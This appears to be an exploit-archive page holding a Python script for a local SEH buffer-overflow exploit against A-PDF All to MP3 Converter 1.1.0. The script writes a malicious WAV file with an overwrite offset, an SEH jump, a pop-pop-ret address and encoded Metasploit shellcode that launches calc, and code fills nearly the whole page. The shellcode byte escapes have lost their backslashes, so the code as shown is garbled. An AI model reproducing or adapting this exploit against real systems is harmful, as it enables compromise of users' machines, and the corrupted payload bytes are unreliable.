A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit
# Published : 2010-09-17
# Author : modpr0be
# Previous Title : MP3 Workstation Version 9.2.1.1.2 SEH exploit
# Next Title : DJ Studio Pro Version 8.1.3.2.1 SEH Exploit

#!/usr/bin/python

################################################################################
# Exploit Title: A-PDF All to MP3 Converter v.1.1.0 Universal Local SEH Exploit
# Date: September 18, 2010
# Author: modpr0be
# Software Link: http://www.a-pdf.com/all-to-mp3/download.htm
# Version: 1.1.0
# Tested on: Windows XP SP3
# 
# Open application --> Next --> Add --> blah.wav --> calc will pop out
#
# Other applications made by a-pdf may be affected.
# this exploit is simply reference from EDB 14681 and 14676
# Exploit using direct EIP is also working.
#
# thx: amalia, offsec, xecureit, jasakom, oebaj, 0x70y, postnix. 
################################################################################


import struct

junk1 = 'A' * 4132
nseh = "xebx06x90x90"
seh = struct.pack('<L', 0x00408B44) # ppr
nops2 = "x90" * 12
# metasploit payload
# windows/exec cmd=calc | msfencode -e x86/alpha_upper
# size 462 bytes
shellcode = ("x89xe1xdaxdexd9x71xf4x5ax4ax4ax4ax4ax4ax43x43"
"x43x43x43x43x52x59x56x54x58x33x30x56x58x34x41"
"x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42"
"x54x41x41x51x32x41x42x32x42x42x30x42x42x58x50"
"x38x41x43x4ax4ax49x4bx4cx4dx38x4bx39x43x30x43"
"x30x43x30x43x50x4cx49x4dx35x46x51x48x52x43x54"
"x4cx4bx50x52x50x30x4cx4bx46x32x44x4cx4cx4bx50"
"x52x44x54x4cx4bx44x32x51x38x44x4fx4ex57x50x4a"
"x51x36x50x31x4bx4fx50x31x49x50x4ex4cx47x4cx45"
"x31x43x4cx44x42x46x4cx47x50x49x51x48x4fx44x4d"
"x45x51x4fx37x4dx32x4cx30x46x32x51x47x4cx4bx46"
"x32x42x30x4cx4bx50x42x47x4cx43x31x48x50x4cx4b"
"x47x30x43x48x4dx55x49x50x44x34x51x5ax43x31x4e"
"x30x46x30x4cx4bx51x58x45x48x4cx4bx50x58x47x50"
"x45x51x48x53x4dx33x47x4cx51x59x4cx4bx50x34x4c"
"x4bx43x31x49x46x50x31x4bx4fx46x51x4fx30x4ex4c"
"x4fx31x48x4fx44x4dx43x31x49x57x47x48x4bx50x44"
"x35x4cx34x43x33x43x4dx4cx38x47x4bx43x4dx46x44"
"x42x55x4bx52x51x48x4cx4bx51x48x51x34x43x31x48"
"x53x45x36x4cx4bx44x4cx50x4bx4cx4bx50x58x45x4c"
"x43x31x48x53x4cx4bx45x54x4cx4bx45x51x4ex30x4b"
"x39x50x44x47x54x46x44x51x4bx51x4bx43x51x46x39"
"x50x5ax50x51x4bx4fx4bx50x50x58x51x4fx51x4ax4c"
"x4bx44x52x4ax4bx4dx56x51x4dx42x4ax43x31x4cx4d"
"x4cx45x48x39x43x30x45x50x43x30x50x50x43x58x50"
"x31x4cx4bx42x4fx4dx57x4bx4fx49x45x4fx4bx4cx30"
"x48x35x49x32x50x56x45x38x4ex46x4dx45x4fx4dx4d"
"x4dx4bx4fx48x55x47x4cx43x36x43x4cx45x5ax4bx30"
"x4bx4bx4bx50x42x55x43x35x4fx4bx47x37x45x43x42"
"x52x42x4fx43x5ax43x30x50x53x4bx4fx49x45x45x33"
"x45x31x42x4cx45x33x43x30x45x5ax41x41")

payload = junk1+nseh+seh+nops2+shellcode

file = open('blah.wav','w')
file.write(payload)
file.close()